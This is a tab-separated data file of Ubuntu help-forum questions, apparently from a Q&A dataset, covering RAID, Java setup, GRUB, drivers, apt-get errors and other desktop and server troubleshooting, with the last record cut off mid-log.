213582	ubuntu 12.10 : raid 5 array degraded on every boot	i 'm running ubuntu 12.10 . i 've set up raid5 using 3 hdds : /dev/sda , /dev/sdb , and /dev/sdc . however on every boot i get this screen : which says raid level 5 active with 2 out of 3 devices , algorithm 2 , warning : there appears to be one or more degraded devices '' . output of /etc/mdadm/mdadm.conf : create owner=root group=disk mode=0660 auto=yes homehost < system > mailaddr root array /dev/md0 metadata=1.2 spares=1 name=bluelady:0 uuid=e0839614:9f79606f:75191039:19d511db output of /proc/mdstat : personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md127 : active ( auto-read-only ) raid5 sda [ 0 ] sdc [ 3 ] sdb [ 1 ] 7813774336 blocks super 1.2 level 5 , 512k chunk , algorithm 2 [ 3/2 ] [ uu_ ] unused devices : < none > output of /etc/fstab : /dev/md0 /data auto defaults , user , owner 0 2 so far i 've tried adding bootdegraded=true to kernel options which makes boot succeed but with some errors on boot but raid volume is mounted . i 've also tried changing /etc/fstab to : /dev/md127 /data auto defaults , user , owner 0 2 as /dev/md0 does n't actually exist on my system . i 've also tried changing the /etc/mdadm.conf last line to : array /dev/md0 level=raid5 num-devices=3 metadata=1.2 name=bluelady:0 uuid=blahblahblah obviously the uuid is correct . i 've just not typed it out here . i 've also noticed that there is an open bug on this subject : https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/990913 . i can mount the raid array once booted in but on boot it has issues . is this a known issue ? if not what can i try to fix this issue ?
213583	not recognize jdk after installation in ubuntu 12.10	i did these steps without error : jdk path : downloads/jdk-6u37-linux-x64.bin commands in terminal : mkdir programs cd programs bash ../downloads/jdk-6u37-linux-x64.bin ln -s jdk-6u37-linux-x64 jdk set java_home and path : in home - > view menu - > show hidden files . then open .bashrc in text editor . i added the following lines to end of file . export java_home= $ home/programs/jdk export path= : $ java_home/bin : $ path this is the result of executing the command echo $ java_home : /programs/jdk this is the result of executing the command echo $ path : : /programs/jdk/bin : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games1 and problem is : this is the result of executing the command java -version : the program 'java ' can be found in the following packages : * default-jre * gcj-4.6-jre-headless * gcj-4.7-jre-headless * openjdk-7-jre-headless * openjdk-6-jre-headless try : sudo apt-get install
213584	how to remount a read-only folder as readwrite ?	background : i need to edit a file which is read only , and its parent folder is also read only . this file is located at a remote appliance . through ssh i logged in to this as admin and i have the root access . command `` ls -l '' show the permissions of file as '' -rwxr-xr-x 1 admin root 952 oct 30 02:01 file.sh '' and for folder drwxr-xr-x 3 admin root i am not as such familiar with linux but i searched and found that these above lines mean that the admin is the owner and he/she has the read and write permission . someone suggested to remount the folder which contains this file . problem : how will i remount it , i used mount -o remount , rw /folde1/folder2/targetfolder but it gave mount : ca n't find /folde1/folder2/targetfolder in /etc/fstab or /etc/mtab i looked at question how do i remount a filesystem as read/write ? , but i did not understand the answer ... it said correct syntax is sudo mount -o remount , rw /partition/identifier /mount/point what should i give as /partition/identifier and /mount/point ? i.e . what is this /partition/identifier and /mount/point ?
213586	problems in updating ubuntu 12.04	installed ubuntu 12.04 lts . i got this problem : no install option in any software in software centre ca n't install any tar.gz or any program ca n't update through terminal ca n't download any update , its says check ur network connection but my internet is working at the same time .
213589	how to install a older version of package like liquid 2.2.2 ?	i 'd like install liquid 2.2.2 for jekyll . however , the latest version of jekyll is 2.3.0 . how to install a older version of package like liquid 2.2.2 in ubuntu 12.10 ?
213593	remove update notification in unity indicator after xubuntu-desktop installation ( 12.04 )	i 'm on ubuntu 12.04 using unity . to try it out , i installed the xubuntu-desktop package . ever since i have a orange or red update notification ( see attachment ) in my unity indicator panel , telling me about recommended and security updates , respectively . q : how can i disable the notifications ? what i expect to happen : there is an option to show these updates when you press the update notification . i disabled it and thought it would n't show again after a reboot . in addition , i ran dconf-editor and manually checked if the option to hide updates is enabled . what happened instead : the update notifications are still there , the only way to get rid of them is to do the updates .
213595	how to fix `` maximum number of clients reached '' ?	about 30 oct i ran recent updates for 12.04 64bit . no errors occurred . next day when i booted computer most apps would not start or if started ( eg chrome ) other app windows do not appear . trying a command line start on most apps gives this message : `` maximum number of clients reachederror : can not open display : :0 '' the 'error ' part of message not always the same . have tried to find solution on ubuntu forums and other linux web sites , but can not find a solution . help please .
213599	source command not found	i installed python environment and everything related to that being a user xxx and in group nginx . when i try to activate the environment using the source /path/to/activate being user xxx i can do it but when i log in as user yyy who is in the group nginx and try to use the command -source /path/to/activate i am getting this error message source : command not found . i have looked at this question here sudo : source : command not found but that doesnt help .
213600	setting default byobu screens	i 've just installed quantal as a fresh install , and want to set up byobu as it was on my old system . in a previous version of byobu there was an option in byobu-config ( via the f9 key ) to create new windows which had a checkbox option to select if it was a startup option . the whole 'create new window ' section of byobu-config is not there anymore ! i 've tried adding the details of the windows i want to ~/.byobu/windows ( below ) but this has had no effect . screen -t localhost bash screen -t staging ssh dt123 screen -t fsuk1 ssh fs screen -t php php -a screen -t python bpython
213602	total commander alternatives	i know this is an old topic , but i still have a problem to find a good alternative , maybe i have high standards . there is a 4 years old article about this . but the question is , why is nautilus so bad in two pane mode ? why is it so slow when browsing folders ? and , why are all other file managers from article so ugly ? i like krusader , but it does not looks near as good as nautilus . is nautilus slow because of the fancy gui rendering ? is it hard to make file manager which fits nice in unity ? what is your experience and what file manager are you using ? edit : i got interesting results by making krusader look native in unity . i like it now .
213605	how can i erase other versions of ubuntu ( backtrack , studio 10.04 ) from my computer 's hd and boot selection .	i have 4 choices for os 's , 3 on first boot screen ( winows 7 , backtrack 5 , and ubuntu studio 10.04 ) . backtrack and studio are problematic and i wish to erase all traces of them but leave my windows 7 and ubuntu 12.xx wubi intact . what is the best way to go about this ? thanks !
213606	how connect to ubuntu server if it is with internal ip	i have ubuntu server in my home and i want get acces it from elswhere . i do n't have public adress ip on my ubuntu server so i ca n't reach it from internet . i have static dns etc . i heard of hamachi but i must install this on every computer which i want to connect to my ubuntu server at home . i want only acces to terminal .
213610	is chromium gtk+ theme lighter than the others ?	or is it heavier ? what other aspects could one consider here beside aesthetics ?
213612	problems installing ubuntu 12.10 alongside windows 8	i ca n't install ubuntu on my computer ( asus ux31 with windows 8 ) , the primary reason is that i can not boot from any usb device with the new windows called `` uefi '' . do you guys have an solution for this ? i apreciate the help !
213614	`` waiting for network configuration '' problem	this problem happens sometimes when ubuntu starts up . you ca n't really boot to the interface sometimes . splash screen with the 5 dots and a message saying : waiting for network configuration then : waiting an additional 60 seconds for network configuration
213620	ubuntu 12.04 directory is full and wo n't boot	i tried to restore some permanently deleted files from my external hard drive the other day , but i did n't take into account the fact that my home folder had not so much free space left and now it 's full . it appeared to have no problem at the time but when i turned off the laptop and tried to boot in ubuntu again it just stays in the boot screen and says something like `` swap error '' . tried to delete those restored files through windows but everything i 've tried so far does not work since they have write protection . any suggestions ? is this actually the problem , that my home folder is full ?
213629	ripping cds not working : no id tags	no cd ripper was working in my vostro 3550 - 12.10 quantal . later on i found out that you do not have to rip cds anymore in ubuntu : all you have to do is open the cd and drag all songs ( that shows in .wav format ) to your desktop . trouble is : no id tags . anyone ?
213630	ubuntu 12 heating problem in acer 5755g laptop	i installed recent ubuntu version in my acer 5755g laptop , it is over-heating . the laptop is in good condition , it 'll not get heat while using windows 7 . i think the problem with the graphics card . but as i 'm new to ubuntu i do n't know how to solve the problem . so please someone help me . laptop configurations : i5 second generation 750gb hdd 2gb nvidia graphics card 4gb ram
213632	i have accidentally turned off my password - how do i recover from this ?	i have the following problem with my computer . it 's a desktop , 32 bit , originally came with windows xp , 999.4 mib of ram , intel pentium ( r ) 4 cpu 2.60ghz x 2 , 77.7gb disk space . i accidentally turned off my password , : ( so if i need to download something i ca n't . and i ca n't put a diff . os on here , my usb was missed up by ubuntu , its a 1gb usb , and it says there is no room on there `` with nothing on it '' if i type su in the terminal , it asks me for my password , i type it in , does n't work . this was before i changed my password . during the installation i was never asked for a password .
213638	how to find a samba share 's gvfs path ?	if nautilus is used to drop a file on a samba share into an app , then the app will see : '' smb : //server/share/file '' how is the app supposed to detect real , working gvfs path of that file ? different ubuntu versions have different paths to the gvfs folder . is there an api , or conversion script , or anything like that , that could translate that into the ull gvfs path ?
213641	cant click after update to 12.10	just updated from 12.04 to the newest 12.10 and now i ca n't click things correctly . things i can click on are top black bar cons left side of the screen things on my desktop such as short cuts and folders however if i open a folder for instance i can not click anything in it , instead each time i click the mouse pointer turns into a grab fist icon , i cant click things in programs like firefox aswell . i found that i can click anything if i hold ctrl first before clicking . please help return my mouse to normal ! .
213643	how to pair hidden radio bluetooth speakers ?	i have a hidden radio bluetooth speaker , it has worked flawlessly with mac os x , but now that i 'm trying with ubuntu , i get stuck at the `` pass key '' step , no matter which option i try ( random , custom , without pairing ) , it just says set up of new device failed . any suggestions on how to proceed ?
213644	asus xonar u3 volume issues	i received an asus xonar u3 usb sound card today and was pleased to find out that using it under ubuntu 12.10 was as easy as plugging it in and selecting it in the audio preferences . however , what annoys me that the whole range of lowest to highest volume seems to be crammed into about 1 % of the volume scale . between about 1 and ~30 % you hear absolutely nothing , while increasing the volume by just one step has my earphones blasting at full force . this does n't happen with the onboard sound of my thinkpad t420 . any idea what causes this and how it can be fixed ?
213646	ca n't start eclipse juno ( ubuntu 12.10 )	i installed eclipse though the ubuntu software center but i experienced some issues and i wanted to install the official eclipse version . i downloaded eclipse classic 4.2.1 from here : extracted it , but if i double click `` eclipse '' it does n't do anything . any ideas how i can fix this ? my eclipse.ini looks like this -startup plugins/org.eclipse.equinox.launcher_1.3.0.v20120522-1813.jar -- launcher.library plugins/org.eclipse.equinox.launcher.gtk.linux.x86_64_1.1.200.v20120522-1813 -showsplash -vm /usr/lib/jvm/java-7-oracle/bin/java org.eclipse.platform -- launcher.xxmaxpermsize 256m -- launcher.defaultaction openfile -vm /usr/lib/jvm/java-7-oracle/bin/java -vmargs -xms40m -xmx512m i also deinstalled openjdk and installed jdk7 .
213650	advice for addressbook server - ldap , syncml , carddav , or something else	i 'm looking for a solution to share a single address book across my windows 7 laptop , android phone and ubuntu home server . the address book should be synced to the phone so it is available when offline , and should be accessible to mozilla thunderbird on windows 7 and to a webmail app like horde , squirrel mail or roundcube . i 've tried setting up owncloud , carddav , horde ( with syncml ) , etc and have not got anything working to my satisfaction . does anyone have experience doing this for personal use or a small organisation ?
213651	sudo refuses my password	i 've just installed ubuntu 12.04 and now that i want to install a program through the terminal with a command starting with sudo , the terminal says sorry , try again . i just do n't get it , this is my user password which i check with through the software center . what can be then wrong ? ( is it possible that the terminal function differently than the rest of the os in relation to ascii keyboard ? ) please help .
213653	how do i remove ubuntu , wipe hard drive and mac	i bought a samsung ssd 128 gb for my macbook pro 13 mid-2009 , 2.53ghz 8gb ram . i want to try ubuntu on it so i installed it first , everything went fine . but after a couple of week i wanted to switch back to osx . so i booted with the osx disc , erased the ssd hard drive but no i cant install osx . disk utility wont let me erase the disx anymore or create a partition , is says error wrong output input . i have also removed the ssd and used it as an externally trying to completely wipe it but it wont work . please help ! and when i wrote sudo fdisk /dev/sda device contains neither a valid dos partition table , nor sun , sgi or osf disklabel building a new dos disklabel with disk identifier 0xdaa79ffb . changes will remain in memory only , until you decide to write them . after that , of course , the previous content wo n't be recoverable . warning : invalid flag 0x0000 of partition table 4 will be corrected by w ( rite ) and when i wrote sudo fdisk /dev/sda device contains neither a valid dos partition table , nor sun , sgi or osf disklabel building a new dos disklabel with disk identifier 0xdaa79ffb . changes will remain in memory only , until you decide to write them . after that , of course , the previous content wo n't be recoverable . warning : invalid flag 0x0000 of partition table 4 will be corrected by w ( rite )
213667	override key binding	i use inspiron 1460 which need to press fn key to enter f4 . this thus make my alt+f4 more difficult because i need to press 3 keys instead two shorter key combination . i want to change the key binding to alt+esc if possible . can this be achieve ? i use compizsetting to change it before this but no luck .
213672	when to use separate ppas ?	i 'm interested in setting up ppas for a few projects that i 'm working on , and i 'm trying to find out how many ppas i need . should i create one ppa for each project , effectively having a single package in each ? the fact that the name is `` personal package archive '' and the fact that they 're created under my launchpad username make it seem like i should have all of my projects in one ppa - would that cause problems ? what if it 's multiple similar/related packages , such as unity lenses ? the instructions do n't really say anything about how much to put in a single ppa , though they do indicate having more than one is okay .
213675	how do i get rid of the `` advanced options for $ os '' grub menu items ?	i 'd like to simplify my grub menu so it has only the installed os 's list . ( in my case , the windows that came with the machine , ubuntu 12.10 , and centos 6 . ) i see no options in /etc/default/grub that disable this . i thought it was grub_disable_recovery but that 's not it . is there a `` clean '' way to do this ?
213677	i ca n't install skype on ubuntu 11.10 from the software center	i have my new dell inspiron 5520 factory pre installed ubuntu 11.10 i really liked it but i didnt knew any thing about it first it download or intall everything from software center after 3 days i tried installing eset antivirus , not knowing that ubuntu does n't need anti-virus . my ubuntu was not booting after purple screen i searched the net and did factory reset but now i ca n't inatall skype from software center the error is to install skype : i386 , these must be removed embedded gnu c library : binaries ( libc : bin ) please help its urgent and important
213678	how to install x11/xorg ?	my 12.04 x64 system wo n't boot into gui , but i can still use virtual console with my own account , so apparently it 's the windows management system that 's causing it , how can i reinstall it from tty , what 's the apt-get command ?
213680	how to restart kwin when it is hung ?	kwin occasionally hangs , which looks like the system not responding to mouse clicks or key presses - although the mouse pointer still moves when you move the mouse !
213686	screen size and position problem	after installing the fglrx driver everything is ok , but when i install blackbox ( yeah i like blackbox it 's simple ) and i make a custom xsession and log into it , the resolution is ok but the displayed size of the desktop is smaller then the screen and the mouse cursor is just displayed as an x . in my .xinitrc there are only 2 things , a chromium-browser autostart script and exec blackbox , no extra configuration . i do n't see any relevant thing in the logs , no errors . the videocard is a radeon hd 6430m . thank you in advance !
213695	upgrading apache to 2.2.23 on ubuntu 12.04 lts	we had done a pci scan on one of our servers running ubuntu 12.04 lts with apache 2.2.22 . the scan reported a vulnerability in apache 2.2.22 ( apache http server zero-length directory name in ld_library_path vulnerability ) .the report states to upgrade the version to the latest stable release of either 2.2.23 or 2.2.24 . how do i upgrade to the 2.2.23 to fix the vulnerability or is there a patch available that can fix this and if yes can you let me know how that can be patched .
213696	installing additional drivers resulted in command line interface	installed ubuntu in my macbook . it worked fine at first . installed additional drivers and updated the restarted . now , all i get is a command line . i ca n't boot back into the usb stick i originally used to install ubuntu . help ?
213697	how can i install gtk themes on ubuntu ?	how can i install themes in ubuntu 12.10 ? for example , how can i install the following themes on ubuntu : grayday elegant+eggplant
213701	installing mcaffe linux anti virus	very new to ubuntu . i want to install virus protection . downloaded mcaffe linux software . do n't know how to : copy pam_unix.so from /lib/security of a 32-bit ubuntu ( till version 10.10 ) system to a temporary directory /tmp on the 64-bit ubuntu system . from ubuntu 11.04 onwards , pam_unix.so is available under /lib/i386-linux-gnu folder . do i need to download the whole 32-bit version to get this pam_unix.so file ?
213707	ati radeon 4200 hd drivers on ubuntu 12.10	i searched a lot for the good solution , but none seems to work on 12.10 for this graphical card . is there someone yet that found the solution to get this card working with 3d-possibilities ? if yes , please answer so that anyone that has this problem can use the solution ...
213712	how can i change mouse keymapping	i have razer deathadder ( left handed edition ) and a4tech wireless mouse . my problem is i do n't know how to change wireless mouse keymapping ( swaping left/right click ) . can somebody guide me how to do such thing ? list of my devices : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech unifying device . wireless pid:4004 id=8 [ slave pointer ( 2 ) ] ⎜ ↳ razer razer deathadder id=11 [ slave pointer ( 2 ) ] ⎜ ↳ a4tech usb device id=12 [ slave pointer ( 2 ) ] ⎜ ↳ a4tech usb device id=13 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ power button id=7 [ slave keyboard ( 3 ) ] ↳ logitech usb keyboard id=9 [ slave keyboard ( 3 ) ] ↳ logitech usb keyboard id=10 [ slave keyboard ( 3 ) ] this is my razer xinput : device 'razer razer deathadder ' : device enabled ( 121 ) : 1 coordinate transformation matrix ( 123 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 246 ) : 0 device accel constant deceleration ( 247 ) : 5.000000 device accel adaptive deceleration ( 248 ) : 1.000000 device accel velocity scaling ( 249 ) : 10.000000 device product id ( 240 ) : 5426 , 22 device node ( 241 ) : `` /dev/input/event4 '' evdev axis inversion ( 250 ) : 0 , 0 evdev axes swap ( 252 ) : 0 axis labels ( 253 ) : `` rel x '' ( 131 ) , `` rel y '' ( 132 ) , `` rel vert wheel '' ( 274 ) button labels ( 254 ) : `` button left '' ( 124 ) , `` button middle '' ( 125 ) , `` button right '' ( 126 ) , `` button wheel up '' ( 127 ) , `` button wheel down '' ( 128 ) , `` button horiz wheel left '' ( 129 ) , `` button horiz wheel right '' ( 130 ) , `` button side '' ( 269 ) , `` button extra '' ( 270 ) , `` button forward '' ( 271 ) , `` button back '' ( 272 ) , `` button task '' ( 273 ) , `` button unknown '' ( 243 ) , `` button unknown '' ( 243 ) , `` button unknown '' ( 243 ) , `` button unknown '' ( 243 ) evdev middle button emulation ( 255 ) : 0 evdev middle button timeout ( 256 ) : 50 evdev third button emulation ( 257 ) : 0 evdev third button emulation timeout ( 258 ) : 1000 evdev third button emulation button ( 259 ) : 3 evdev third button emulation threshold ( 260 ) : 20 evdev wheel emulation ( 261 ) : 0 evdev wheel emulation axes ( 262 ) : 0 , 0 , 4 , 5 evdev wheel emulation inertia ( 263 ) : 10 evdev wheel emulation timeout ( 264 ) : 200 evdev wheel emulation button ( 265 ) : 4 evdev drag lock buttons ( 266 ) : 0 and this is my wireless mouse xinput : device 'a4tech usb device ' : device enabled ( 121 ) : 1 coordinate transformation matrix ( 123 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 246 ) : 0 device accel constant deceleration ( 247 ) : 1.000000 device accel adaptive deceleration ( 248 ) : 1.000000 device accel velocity scaling ( 249 ) : 10.000000 device product id ( 240 ) : 2522 , 1359 device node ( 241 ) : `` /dev/input/event16 '' evdev axis inversion ( 250 ) : 0 , 0 evdev axes swap ( 252 ) : 0 axis labels ( 253 ) : `` rel x '' ( 131 ) , `` rel y '' ( 132 ) , `` rel horiz wheel '' ( 245 ) , `` rel vert wheel '' ( 274 ) button labels ( 254 ) : `` button left '' ( 124 ) , `` button middle '' ( 125 ) , `` button right '' ( 126 ) , `` button wheel up '' ( 127 ) , `` button wheel down '' ( 128 ) , `` button horiz wheel left '' ( 129 ) , `` button horiz wheel right '' ( 130 ) , `` button side '' ( 269 ) , `` button extra '' ( 270 ) , `` button forward '' ( 271 ) , `` button back '' ( 272 ) , `` button task '' ( 273 ) , `` button unknown '' ( 243 ) , `` button unknown '' ( 243 ) , `` button unknown '' ( 243 ) , `` button unknown '' ( 243 ) , `` button unknown '' ( 243 ) , `` button unknown '' ( 243 ) , `` button unknown '' ( 243 ) , `` button unknown '' ( 243 ) , `` button unknown '' ( 243 ) , `` button unknown '' ( 243 ) , `` button unknown '' ( 243 ) , `` button unknown '' ( 243 ) evdev middle button emulation ( 255 ) : 0 evdev middle button timeout ( 256 ) : 50 evdev third button emulation ( 257 ) : 0 evdev third button emulation timeout ( 258 ) : 1000 evdev third button emulation button ( 259 ) : 3 evdev third button emulation threshold ( 260 ) : 20 evdev wheel emulation ( 261 ) : 0 evdev wheel emulation axes ( 262 ) : 0 , 0 , 4 , 5 evdev wheel emulation inertia ( 263 ) : 10 evdev wheel emulation timeout ( 264 ) : 200 evdev wheel emulation button ( 265 ) : 4 evdev drag lock buttons ( 266 ) : 0
213713	python2.7 help ( ) modules returnd error	# python python 2.7.3 ( default , aug 1 2012 , 05:14:39 ) [ gcc 4.6.3 ] on linux2 type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information . > > > help ( ) welcome to python 2.7 ! this is the online help utility . if this is your first time using python , you should definitely check out the tutorial on the internet at http : //docs.python.org/tutorial/ . enter the name of any module , keyword , or topic to get help on writing python programs and using python modules . to quit this help utility and return to the interpreter , just type `` quit '' . to get a list of available modules , keywords , or topics , type `` modules '' , '' keywords '' , or `` topics '' . each module also comes with a one-line summary of what it does ; to list the modules whose summaries contain a given word such as `` spam '' , type `` modules spam '' . help > modules please wait a moment while i gather a list of all available modules ... /usr/lib/python2.7/dist-packages/gobject/constants.py:24 : warning : g_boxed_type_register_static : assertion `g_type_from_name ( name ) == 0 ' failed import gobject._gobject /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:40 : warning : g_boxed_type_register_static : assertion `g_type_from_name ( name ) == 0 ' failed from gtk import _gtk ** ( python:6240 ) : critical ** : pyg_register_boxed : assertion `boxed_type ! = 0 ' failed /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:40 : warning : can not register existing type `gdkdevice' from gtk import _gtk /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:40 : warning : g_type_get_qdata : assertion `node ! = null ' failed from gtk import _gtk speicherzugriffsfehler ( speicherabzug geschrieben )
213714	developing gnome shell extensions with eclipse as a ide	i would like to know whether any body has used eclipse javascript support for developing gnome-exensions . actually aiming here for the context support which is available in eclipse . and i though if i could add all the java scripts that a extension is inheriting ( base scrips ) in to a user library , then i could included it as a dependency in my extension project . have any once done this already ? does all the methods that are used in a exentions exist in the base scripts ? in what directories does the base scripts exist ? so far i tried adding the scripts in the following directory but still i have error when i try to look at the journal gnome extension code . /usr/share/gnome-shell/js /usr/share/gjs-1.0 thanks
213719	how do i upgrade from ubuntu 9.10 to 12.10 on my acer aspire 3000	i had my acer aspire 3000 as a dual boot xp/ubuntu 9.10 a couple years ago . i recently blew the dust of it and wanted to upgrade to 7/ubuntu 12.10 so i began by formatting the ubuntu side of the partition and apparently damaged the mbr as i could only get black screen with the error message : grub loading ... error : no such partition grub rescue > i then slaved the hdd to my win7 desktop and formatted the entire drive , both sides of the partition then reinstalled it in the acer and tried to install win7 . upon starting the acer i got the same error message : grub loading ... error : no such partition grub rescue > i then tried to reinstall ubuntu 9.10 as i have an ubuntu produced installation cd . same result . next day i received a new battery i had ordered for the acer . i plugged it and the power supply in and hit the power button just to see if i at least could charge the battery but to my surprise ubuntu 9.10 began to install , so i let it and it did . now the hard drive shows 58 gb and 2.5gb partitions neither of which is formatted ntfs for/by windows . i am guessing that the grub/mbr was repaired somehow by the ubuntu reinstallation . my question , should you choose to accept it ; how can i get to my goal of dual boot win7/ubuntu 12.10 . i am a beginner and do n't know much about linux or the terminology . thank you for your thoughts and help .
213721	how to change half-window shortcuts ?	ubuntu seems to have changed the half-window shortcuts from ctrl+alt+numpad-numbers to half using the numpad and ctrl+super+left/right ( which i find absolutely ridiculous ) . how do i change it back ? i ca n't find it under `` keyboard '' .
213724	12.10 sound resumes only after suspend	i installed the 12.10 yesterday and like 12.04 there was no sound , i have an acer 4830 tg . i noticed that the hdmi output is working fine , but speaker or headphone is n't working . so i did the following : sudo add-apt-repository ppa : ubuntu-audio-dev sudo apt-get update sudo apt-get dist-upgrade and still could n't get the sound . then i found the temp fix for this issue which is to suspend the machine completely and resume . however , after restart the same thing happens . is there a solution to this issue ?
213731	apt-get is broken ( ubuntu 10.04 server )	i can not install any package in the server , as i am newbie with server . in the morning i found that some , i am not able to install any package from command line in the server . now every package is now manually downloaded packages and then installed in the server . can anyone please tell me what is the issue and how could it be resolved ? os : ubuntu 10.04.4 lts ( 64 bit ) below is the error : iam @ ubuntu $ sudo apt-get install pidgin reading package lists ... done building dependency tree reading state information ... done pidgin is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 102 not upgraded . 32 not fully installed or removed . after this operation , 0b of additional disk space will be used . traceback ( most recent call last ) : file `` /usr/bin/apt-listchanges '' , line 33 , in < module > from alchacks import * file `` /usr/share/apt-listchanges/alchacks.py '' , line 32 , in < module > sys.stderr.write ( _ ( `` ca n't set locale ; make sure $ lc_* and $ lang are correct ! \n '' ) ) nameerror : name '_ ' is not defined perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lc_ctype = `` utf-8 '' , lang = `` en_in '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory setting up shared-mime-info ( 0.71-1ubuntu2 ) ... /var/lib/dpkg/info/shared-mime-info.postinst : line 13 : 21935 segmentation fault update-mime-database.real /usr/share/mime dpkg : error processing shared-mime-info ( -- configure ) : subprocess installed post-installation script returned error exit status 139 dpkg : dependency problems prevent configuration of libgtk2.0-0 : libgtk2.0-0 depends on shared-mime-info ; however : package shared-mime-info is not configured yet . dpkg : error processing libgtk2.0-0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of chromium-browser : chromium-browser depends on libgtk2.0-0 ( > = 2.20.0 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing chromium-browser ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of chromium-codecs-ffmpeg : chromium-codecs-ffmpeg depends on chromium-browser ( > = 4.0.203.0~ ) ; however : package chromium-browser is not configured yet . dpkg : error processing chromium-codecs-ffmpeg ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of chromium-browser-l10n : chromium-browser-l10n depends on chromium-browser ( = 18.0.1025.151~r130497-0ubuntu0.10.04.no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already 1 ) ; however : package chromium-browser is not configured yet . dpkg : error processing chromium-browser-l10n ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libevdocument2 : libevdocument2 depends on libgtk2.0-0 ( > = 2.14.0 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing libevdocument2 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libevview2 : libevview2 depends on libevdocument2 ( > = 2.29.5 ) ; however : package libevdocument2 is not configured yet . libevview2 depends on libgtk2.0-0 ( > = 2.20.0 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing libevview2 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of evince : evince depends on libevdocument2 ( > = 2.29.5 ) ; however : package libevdocument2 is not configured yet . evince depends on libevview2 ( > = 2.29.no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already 5 ) ; however : package libevview2 is not configured yet . evince depends on libgtk2.0-0 ( > = 2.16.0 ) ; however : package libgtk2.0-0 is not configured yet . evince depends on shared-mime-info ; however : package shared-mime-info is not configured yet . dpkg : error processing evince ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of firefox : firefox depends on libgtk2.0-0 ( > = 2.20.0 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing firefox ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gcalctool : gcalctool depends on libgtk2.0-0 ( > = 2.18.0 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing gcalctool ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgdict-1.0-6 : libgdict-1.0-6 depends on libgtk2.0-0 ( > = 2.18.0 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing libgdict-1.0-6 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gnome-utils : gnome-utils depends on libgdict-1.0-6 ( > = 2.23.90 ) ; however : package libgdict-1.0-6 is not configured yet . gnome-utils depends on libgtk2.0-0 ( > = 2.18.0 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing gnome-utils ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gtk2-engines-pixbuf : gtk2-engines-pixbuf depends on gtk2.0-binver-2.10.0 ; however : package gtk2.0-binver-2.10.0 is not installed . package libgtk2.0-0 which provides gtk2.0-binver-2.10.0 is not configured yet . gtk2-engines-pixbuf depends on libgtk2.0-0 ( = 2.20.1-0ubuntu2.1 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing gtk2-engines-pixbuf ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libedataserverui1.2-8 : libedataserverui1.2-8 depends on libgtk2.0-0 ( > = 2.14.0 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing libedataserverui1.2-8 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgail18 : libgail18 depends on libgtk2.0-0 ( = 2.20.1-0ubuntu2.1 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing libgail18 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgtk2.0-bin : libgtk2.0-bin depends on libgtk2.0-0 ( > = 2.20.1-0ubuntu2.1 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing libgtk2.0-bin ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgtk2.0-dev : libgtk2.0-dev depends on libgtk2.0-0 ( = 